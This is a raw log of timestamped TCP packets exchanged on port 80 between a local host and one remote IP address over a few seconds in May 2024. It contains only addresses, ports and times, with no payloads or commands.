May 29, 2024 14:25:25.946630955 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946643114 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946649075 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.946657896 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946670055 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946675062 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.946681976 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946692944 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.946696997 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946710110 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946710110 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.946722984 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946744919 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.946770906 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.947108030 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947119951 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947144032 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947169065 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947170973 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.947181940 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947194099 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947207928 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947221994 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.947241068 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947249889 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.947253942 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947267056 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947278976 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947278976 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.947290897 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947303057 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947308064 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.947315931 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947329044 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947336912 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.947349072 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947351933 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.947364092 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947375059 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.947395086 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.947417021 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.138762951 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.138782978 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.138802052 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.138808966 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.138818979 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.138834000 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.138848066 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.138859034 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.138937950 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.138943911 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.138956070 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.138977051 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.138984919 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.138987064 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139007092 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139025927 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139050007 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.139074087 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139086008 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139097929 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139118910 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.139141083 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.139300108 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139312983 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139323950 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139364958 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.139417887 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139431953 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139442921 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139461040 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.139487982 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.139544964 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139555931 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139604092 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.139605045 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139672995 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139684916 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139693975 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139720917 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.139734983 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139744043 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.139750004 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139764071 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139776945 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139786959 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.139789104 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.139816046 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.140173912 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140202999 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140219927 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.140249968 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140290022 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.140311956 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140324116 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140368938 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.140403032 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140415907 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140425920 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140436888 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140454054 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.140520096 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140532970 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140532970 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.140546083 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140558958 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140579939 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.140609980 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.140691042 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140799999 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140810966 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140820026 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140831947 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140842915 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140844107 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.140855074 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140866995 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140871048 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.140880108 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.140893936 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.140907049 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.143965006 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.143992901 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144016981 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144038916 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.144067049 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.144217014 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144228935 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144239902 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144252062 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144263029 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144273996 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144285917 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.144287109 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144299030 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144311905 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144314051 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.144323111 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144339085 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144351006 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.144357920 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144371986 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144381046 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.144382954 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144398928 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.144428968 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.144781113 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144805908 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144823074 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144844055 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.144900084 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144933939 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.144956112 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144967079 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144978046 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.144994974 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.145093918 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145119905 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145129919 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.145133018 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145165920 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.145190954 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145204067 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145215988 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145226955 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145247936 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.145278931 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.145487070 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145536900 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145556927 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145574093 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145589113 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.145612001 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.145615101 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145627975 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145649910 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145663023 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.145669937 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145687103 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145699024 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145708084 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.145711899 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145731926 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145731926 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.145745039 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145762920 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.145827055 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145838022 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145848036 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145860910 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145863056 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.145872116 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.145893097 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.145920038 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.148988008 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.149085999 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.149099112 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.149110079 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.149121046 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.149133921 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.149135113 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.149148941 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.149157047 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.149161100 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.149185896 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.149200916 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.362848043 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.363002062 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:26.798899889 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:26.799103975 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.027836084 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033027887 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033054113 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033066988 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033077955 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033093929 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033114910 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033117056 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033130884 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033143997 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033155918 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033169985 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033175945 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033190966 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033199072 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033204079 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033217907 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033226013 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033257008 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033278942 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033291101 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033301115 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033313036 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033324003 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033324003 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033334970 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033348083 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033350945 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033360958 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033373117 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033373117 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033387899 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033401012 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033418894 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033437967 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033451080 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033459902 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033471107 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033483028 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033493042 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033497095 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033509970 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033514023 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033520937 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033533096 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033540010 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033576012 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033581018 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033617973 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033621073 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033629894 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033641100 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033652067 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033663034 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033664942 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033674955 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033687115 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033694983 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033699036 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033710957 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033721924 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033723116 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033734083 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033746004 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033755064 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033757925 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033770084 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033776045 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033782005 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033792973 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033809900 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033811092 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033822060 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033832073 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033834934 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033848047 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033871889 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033879995 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033890963 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033901930 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033905029 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033912897 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033935070 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033938885 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033951044 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033961058 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033962011 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033982992 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.033992052 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.033997059 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034018040 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034053087 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034065962 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034075975 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034086943 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034109116 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034220934 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034231901 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034243107 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034252882 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034267902 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034277916 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034279108 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034291029 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034301996 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034303904 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034313917 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034332991 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034353018 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034365892 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034375906 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034383059 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034388065 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034393072 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034399986 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034413099 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034416914 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034425020 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034436941 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034439087 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034449100 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034460068 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034461021 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034471989 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034482956 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034483910 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034496069 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034504890 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034508944 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034522057 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034533978 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034542084 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034545898 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034558058 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034569025 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034584999 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034719944 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034778118 CEST	80	49760	111.90.158.40	192.168.2.4
